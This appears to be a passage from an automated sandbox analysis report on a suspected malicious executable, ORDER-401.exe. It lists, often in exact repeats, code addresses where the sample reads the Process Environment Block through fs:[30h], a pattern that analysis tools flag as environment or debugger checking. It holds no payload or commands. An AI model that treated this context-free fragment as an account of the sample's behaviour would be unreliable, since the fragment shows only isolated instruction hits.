                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E3F0 mov eax, dword ptr fs:[00000030h]4_2_0155E3F0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015763FF mov eax, dword ptr fs:[00000030h]4_2_015763FF
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015503E9 mov eax, dword ptr fs:[00000030h]4_2_015503E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01538397 mov eax, dword ptr fs:[00000030h]4_2_01538397
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01538397 mov eax, dword ptr fs:[00000030h]4_2_01538397
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01538397 mov eax, dword ptr fs:[00000030h]4_2_01538397
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156438F mov eax, dword ptr fs:[00000030h]4_2_0156438F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156438F mov eax, dword ptr fs:[00000030h]4_2_0156438F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153E388 mov eax, dword ptr fs:[00000030h]4_2_0153E388
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153E388 mov eax, dword ptr fs:[00000030h]4_2_0153E388
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153E388 mov eax, dword ptr fs:[00000030h]4_2_0153E388
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h]4_2_0153A250
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546259 mov eax, dword ptr fs:[00000030h]4_2_01546259
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C8243 mov eax, dword ptr fs:[00000030h]4_2_015C8243
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C8243 mov ecx, dword ptr fs:[00000030h]4_2_015C8243
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0274 mov eax, dword ptr fs:[00000030h]4_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544260 mov eax, dword ptr fs:[00000030h]4_2_01544260
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544260 mov eax, dword ptr fs:[00000030h]4_2_01544260
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544260 mov eax, dword ptr fs:[00000030h]4_2_01544260
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153826B mov eax, dword ptr fs:[00000030h]4_2_0153826B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153823B mov eax, dword ptr fs:[00000030h]4_2_0153823B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A2C3 mov eax, dword ptr fs:[00000030h]4_2_0154A2C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A2C3 mov eax, dword ptr fs:[00000030h]4_2_0154A2C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A2C3 mov eax, dword ptr fs:[00000030h]4_2_0154A2C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A2C3 mov eax, dword ptr fs:[00000030h]4_2_0154A2C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A2C3 mov eax, dword ptr fs:[00000030h]4_2_0154A2C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015502E1 mov eax, dword ptr fs:[00000030h]4_2_015502E1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015502E1 mov eax, dword ptr fs:[00000030h]4_2_015502E1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015502E1 mov eax, dword ptr fs:[00000030h]4_2_015502E1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E284 mov eax, dword ptr fs:[00000030h]4_2_0157E284
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E284 mov eax, dword ptr fs:[00000030h]4_2_0157E284
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C0283 mov eax, dword ptr fs:[00000030h]4_2_015C0283
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C0283 mov eax, dword ptr fs:[00000030h]4_2_015C0283
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C0283 mov eax, dword ptr fs:[00000030h]4_2_015C0283
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015502A0 mov eax, dword ptr fs:[00000030h]4_2_015502A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015502A0 mov eax, dword ptr fs:[00000030h]4_2_015502A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D62A0 mov eax, dword ptr fs:[00000030h]4_2_015D62A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D62A0 mov ecx, dword ptr fs:[00000030h]4_2_015D62A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D62A0 mov eax, dword ptr fs:[00000030h]4_2_015D62A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D62A0 mov eax, dword ptr fs:[00000030h]4_2_015D62A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D62A0 mov eax, dword ptr fs:[00000030h]4_2_015D62A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D62A0 mov eax, dword ptr fs:[00000030h]4_2_015D62A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548550 mov eax, dword ptr fs:[00000030h]4_2_01548550
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548550 mov eax, dword ptr fs:[00000030h]4_2_01548550
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157656A mov eax, dword ptr fs:[00000030h]4_2_0157656A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157656A mov eax, dword ptr fs:[00000030h]4_2_0157656A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157656A mov eax, dword ptr fs:[00000030h]4_2_0157656A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D6500 mov eax, dword ptr fs:[00000030h]4_2_015D6500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550535 mov eax, dword ptr fs:[00000030h]4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550535 mov eax, dword ptr fs:[00000030h]4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550535 mov eax, dword ptr fs:[00000030h]4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550535 mov eax, dword ptr fs:[00000030h]4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550535 mov eax, dword ptr fs:[00000030h]4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550535 mov eax, dword ptr fs:[00000030h]4_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01614500 mov eax, dword ptr fs:[00000030h]4_2_01614500
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E53E mov eax, dword ptr fs:[00000030h]4_2_0156E53E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E53E mov eax, dword ptr fs:[00000030h]4_2_0156E53E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E53E mov eax, dword ptr fs:[00000030h]4_2_0156E53E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E53E mov eax, dword ptr fs:[00000030h]4_2_0156E53E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E53E mov eax, dword ptr fs:[00000030h]4_2_0156E53E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015465D0 mov eax, dword ptr fs:[00000030h]4_2_015465D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A5D0 mov eax, dword ptr fs:[00000030h]4_2_0157A5D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A5D0 mov eax, dword ptr fs:[00000030h]4_2_0157A5D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E5CF mov eax, dword ptr fs:[00000030h]4_2_0157E5CF
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E5CF mov eax, dword ptr fs:[00000030h]4_2_0157E5CF
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156E5E7 mov eax, dword ptr fs:[00000030h]4_2_0156E5E7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015425E0 mov eax, dword ptr fs:[00000030h]4_2_015425E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C5ED mov eax, dword ptr fs:[00000030h]4_2_0157C5ED
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C5ED mov eax, dword ptr fs:[00000030h]4_2_0157C5ED
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E59C mov eax, dword ptr fs:[00000030h]4_2_0157E59C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01542582 mov eax, dword ptr fs:[00000030h]4_2_01542582
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01542582 mov ecx, dword ptr fs:[00000030h]4_2_01542582
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01574588 mov eax, dword ptr fs:[00000030h]4_2_01574588
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015645B1 mov eax, dword ptr fs:[00000030h]4_2_015645B1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015645B1 mov eax, dword ptr fs:[00000030h]4_2_015645B1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C05A7 mov eax, dword ptr fs:[00000030h]4_2_015C05A7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C05A7 mov eax, dword ptr fs:[00000030h]4_2_015C05A7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C05A7 mov eax, dword ptr fs:[00000030h]4_2_015C05A7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156245A mov eax, dword ptr fs:[00000030h]4_2_0156245A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153645D mov eax, dword ptr fs:[00000030h]4_2_0153645D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E443 mov eax, dword ptr fs:[00000030h]4_2_0157E443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156A470 mov eax, dword ptr fs:[00000030h]4_2_0156A470
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156A470 mov eax, dword ptr fs:[00000030h]4_2_0156A470
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156A470 mov eax, dword ptr fs:[00000030h]4_2_0156A470
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CC460 mov ecx, dword ptr fs:[00000030h]4_2_015CC460
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01578402 mov eax, dword ptr fs:[00000030h]4_2_01578402
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01578402 mov eax, dword ptr fs:[00000030h]4_2_01578402
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01578402 mov eax, dword ptr fs:[00000030h]4_2_01578402
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A430 mov eax, dword ptr fs:[00000030h]4_2_0157A430
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153E420 mov eax, dword ptr fs:[00000030h]4_2_0153E420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153E420 mov eax, dword ptr fs:[00000030h]4_2_0153E420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153E420 mov eax, dword ptr fs:[00000030h]4_2_0153E420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153C427 mov eax, dword ptr fs:[00000030h]4_2_0153C427
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6420 mov eax, dword ptr fs:[00000030h]4_2_015C6420
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015404E5 mov ecx, dword ptr fs:[00000030h]4_2_015404E5
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015744B0 mov ecx, dword ptr fs:[00000030h]4_2_015744B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CA4B0 mov eax, dword ptr fs:[00000030h]4_2_015CA4B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015464AB mov eax, dword ptr fs:[00000030h]4_2_015464AB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CE75D mov eax, dword ptr fs:[00000030h]4_2_015CE75D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540750 mov eax, dword ptr fs:[00000030h]4_2_01540750
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582750 mov eax, dword ptr fs:[00000030h]4_2_01582750
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582750 mov eax, dword ptr fs:[00000030h]4_2_01582750
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C4755 mov eax, dword ptr fs:[00000030h]4_2_015C4755
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157674D mov esi, dword ptr fs:[00000030h]4_2_0157674D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157674D mov eax, dword ptr fs:[00000030h]4_2_0157674D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157674D mov eax, dword ptr fs:[00000030h]4_2_0157674D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01548770 mov eax, dword ptr fs:[00000030h]4_2_01548770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550770 mov eax, dword ptr fs:[00000030h]4_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540710 mov eax, dword ptr fs:[00000030h]4_2_01540710
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01570710 mov eax, dword ptr fs:[00000030h]4_2_01570710
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C700 mov eax, dword ptr fs:[00000030h]4_2_0157C700
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157273C mov eax, dword ptr fs:[00000030h]4_2_0157273C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157273C mov ecx, dword ptr fs:[00000030h]4_2_0157273C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157273C mov eax, dword ptr fs:[00000030h]4_2_0157273C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BC730 mov eax, dword ptr fs:[00000030h]4_2_015BC730
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C720 mov eax, dword ptr fs:[00000030h]4_2_0157C720
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C720 mov eax, dword ptr fs:[00000030h]4_2_0157C720
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154C7C0 mov eax, dword ptr fs:[00000030h]4_2_0154C7C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C07C3 mov eax, dword ptr fs:[00000030h]4_2_015C07C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015447FB mov eax, dword ptr fs:[00000030h]4_2_015447FB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015447FB mov eax, dword ptr fs:[00000030h]4_2_015447FB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015627ED mov eax, dword ptr fs:[00000030h]4_2_015627ED
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015627ED mov eax, dword ptr fs:[00000030h]4_2_015627ED
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015627ED mov eax, dword ptr fs:[00000030h]4_2_015627ED
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CE7E1 mov eax, dword ptr fs:[00000030h]4_2_015CE7E1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E678E mov eax, dword ptr fs:[00000030h]4_2_015E678E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015407AF mov eax, dword ptr fs:[00000030h]4_2_015407AF
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160866E mov eax, dword ptr fs:[00000030h]4_2_0160866E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160866E mov eax, dword ptr fs:[00000030h]4_2_0160866E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155C640 mov eax, dword ptr fs:[00000030h]4_2_0155C640
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01572674 mov eax, dword ptr fs:[00000030h]4_2_01572674
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A660 mov eax, dword ptr fs:[00000030h]4_2_0157A660
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A660 mov eax, dword ptr fs:[00000030h]4_2_0157A660
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582619 mov eax, dword ptr fs:[00000030h]4_2_01582619
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE609 mov eax, dword ptr fs:[00000030h]4_2_015BE609
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155260B mov eax, dword ptr fs:[00000030h]4_2_0155260B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E627 mov eax, dword ptr fs:[00000030h]4_2_0155E627
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01576620 mov eax, dword ptr fs:[00000030h]4_2_01576620
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01578620 mov eax, dword ptr fs:[00000030h]4_2_01578620
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154262C mov eax, dword ptr fs:[00000030h]4_2_0154262C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0157A6C7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A6C7 mov eax, dword ptr fs:[00000030h]4_2_0157A6C7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE6F2 mov eax, dword ptr fs:[00000030h]4_2_015BE6F2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE6F2 mov eax, dword ptr fs:[00000030h]4_2_015BE6F2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE6F2 mov eax, dword ptr fs:[00000030h]4_2_015BE6F2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE6F2 mov eax, dword ptr fs:[00000030h]4_2_015BE6F2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C06F1 mov eax, dword ptr fs:[00000030h]4_2_015C06F1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C06F1 mov eax, dword ptr fs:[00000030h]4_2_015C06F1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544690 mov eax, dword ptr fs:[00000030h]4_2_01544690
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01544690 mov eax, dword ptr fs:[00000030h]4_2_01544690
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015766B0 mov eax, dword ptr fs:[00000030h]4_2_015766B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157C6A6 mov eax, dword ptr fs:[00000030h]4_2_0157C6A6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C0946 mov eax, dword ptr fs:[00000030h]4_2_015C0946
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CC97C mov eax, dword ptr fs:[00000030h]4_2_015CC97C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E4978 mov eax, dword ptr fs:[00000030h]4_2_015E4978
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E4978 mov eax, dword ptr fs:[00000030h]4_2_015E4978
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01566962 mov eax, dword ptr fs:[00000030h]4_2_01566962
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01566962 mov eax, dword ptr fs:[00000030h]4_2_01566962
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01566962 mov eax, dword ptr fs:[00000030h]4_2_01566962
